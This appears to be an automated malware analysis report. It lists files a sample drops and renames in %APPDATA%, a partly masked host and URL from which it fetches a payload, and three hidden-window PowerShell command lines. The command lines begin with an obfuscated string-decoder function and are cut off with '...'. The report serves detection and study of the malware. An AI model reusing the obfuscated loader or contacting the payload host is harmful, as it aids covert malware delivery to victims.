Technical Information
- %APPDATA%\bitaf9f.tmp
- %APPDATA%\bit261.tmp
- %APPDATA%\bitaf9f.tmp
- %APPDATA%\bit261.tmp
- from %APPDATA%\bitaf9f.tmp to %APPDATA%\bogs.lav
- from %APPDATA%\bit261.tmp to %APPDATA%\bogs.lav
- 'st#####michaelsmith.com':80
- http://st#####michaelsmith.com/k2/Spartan.asi
- DNS ASK st#####michaelsmith.com
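- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Unde9 ([String]$Acatapos){For($Spectr=4; $Spectr -lt $Acatapos.Length-1; $Spectr+=(4+1)){$Fangsno=$Acatapos.Substring( $Spectr, 1);$Eyeop+=$Fangsno};$Eyeop;}$Spises=Unde9 ...' (with hidden window)
  Note: the visible Unde9 function is a string decoder. It keeps one character out of every five of its argument (indices 4, 9, 14, …) and discards the four filler characters before each. The rest of the command line is truncated ("...") in this listing, so the decoded strings are not shown; the same function opens the two command lines that follow.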
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Unde9 ([String]$Acatapos){For($Spectr=4; $Spectr -lt $Acatapos.Length-1; $Spectr+=(4+1)){$Fangsno=$Acatapos.Substring( $Spectr, 1);$Eyeop+=$Fangsno};$Eyeop;}$Spises=Unde9 ...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Unde9 ([String]$Acatapos){For($Spectr=4; $Spectr -lt $Acatapos.Length-1; $Spectr+=(4+1)){$Fangsno=$Acatapos.Substring( $Spectr, 1);$Eyeop+=$Fangsno};$Eyeop;}$Spises=Unde9 ...